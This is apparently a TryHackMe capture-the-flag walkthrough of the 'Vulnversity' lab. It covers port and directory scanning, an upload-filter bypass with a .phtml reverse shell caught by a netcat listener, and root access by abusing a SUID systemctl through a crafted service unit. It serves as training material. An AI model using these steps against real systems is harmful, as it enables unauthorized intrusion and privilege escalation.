Vulnversity TryHackMe Walkthrough
Challenge Link: https://tryhackme.com/room/vulnversity
Enumerating and Initial Access
We begin our enumeration by running a port scan with Nmap, checking default scripts.
m1m3@kali:~$ nmap -sV -oA nmap/vulnversity 10.10.160.174
Starting Nmap 7.80 ( https://nmap.org )
Nmap scan report for 10.10.160.174
Host is up (0.26s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey
| 2048 5a:4f:fc:b8:c8:76:1c:b5:85:1c:ac:b2:86:41:1c:5a (RSA)
| 256 ac:9d:ec:44:61:0c:28:85:00:88:e9:68:e9:d0:cb:3d (ECDSA)
|_ 256 30:50:cb:70:5a:86:57:22:cb:52:d9:36:34:dc:a5:58 (ED25519)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3128/tcp open http-proxy Squid http proxy 3.5.12
|_http-server-header: squid/3.5.12
|_http-title: ERROR: The requested URL could not be retrieved
3333/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Vuln University
Service Info: Host: VULNUNIVERSITY; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 97.26 seconds
We see an Apache Web Server running on port 3333. Let’s fire up our browser and see what we have there.
Next, we will be running a gobuster scan searching for the directories.
m1m3@kali:~$ gobuster dir -u http://10.10.160.174:3333 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster.log
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.160.174:3333
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
Starting gobuster
===============================================================
/images (Status: 301)
/css (Status: 301)
/js (Status: 301)
/fonts (Status: 301)
/internal (Status: 301)
We found some directories. Opening the ‘/internal/’ directory, provides us with some upload functionality!
The first thing that we need to check in upload options is the extension type. To fuzz the extensions we will use BurpSuite. It has a nice feature called intruder which can do the job in an automated fashion.
First we need to upload a file (doesn’t really matter which file) and capture the request with BurpSuite proxy. After that right click on the request and choose send to intruder. Click the “Positions” tab now, find the filename and “Add §” to the extension. It should look like so:
Now add the extensions to the list in the Payload tab and disable the payload encoding option.
As we can see .phtml returns ‘Success’. This is the extension we will be using with our webshell.
I will use the webshell from pentest monkey, you can use any shell you like, change the IP and port in the shell and upload it to the server. After uploading, we can find it at /internal/uploads/.
m1m3@kali:~$ nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.8.5.61] from (UNKNOWN) [10.10.160.174] 43684
Linux vulnuniversity 4.4.0-142-generic #168-Ubuntu SMP Wed Jan 16 21:00:45 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
10:15:00 up 2:29, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@vulnuniversity:/$
And we managed to get into the server. Now we can read the user.txt!
www-data@vulnuniversity:/$ cd /home/bill
cd /home/bill
www-data@vulnuniversity:/home/bill$ wc -c user.txt
wc -c user.txt
33 user.txt
www-data@vulnuniversity:/home/bill$
Privilege Escalation
This task is a little bit challenging. For this we need to exploit the SUID bits. Let’s first look for the SUID bit set.
www-data@vulnuniversity:/bin$ find / -user root -perm -4000 -exec ls -ldb {} \; | grep -v proc
...
-rwsr-xr-x 1 root root 40128 May 16 2017 /bin/su
-rwsr-xr-x 1 root root 142032 Jan 28 2017 /bin/ntfs-3g
-rwsr-xr-x 1 root root 40152 May 16 2018 /bin/mount
-rwsr-xr-x 1 root root 44680 May 7 2014 /bin/ping6
-rwsr-xr-x 1 root root 27608 May 16 2018 /bin/umount
-rwsr-xr-x 1 root root 659856 Feb 13 2019 /bin/systemctl
-rwsr-xr-x 1 root root 44168 May 7 2014 /bin/ping
-rwsr-xr-x 1 root root 30800 Jul 12 2016 /bin/fusermount
...
Looking at the output of the command, we can see that systemctl had a suid bit active. Searching on the GTFO Bins, I found that we can exploit systemctl for privilege escalation. Copy and execute the following script into the /bin directory.
TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"
[Install]
WantedBy=multi-user.target' > $TF
systemctl link $TF
systemctl enable --now $TF
This will write the output /root/root.txt into the /tmp. If we see in the /tmp directory, we can see a file named output, which is our flag!
www-data@vulnuniversity:/bin$ wc -c /tmp/output
wc -c /tmp/output
33 /tmp/output
www-data@vulnuniversity:/bin$
That’s it! Thanks for reading! Make sure to stay tuned for more upcoming Try Hack Me walkthroughs!
NOTE: The awesome artwork used in this article was created by Christi du Toit.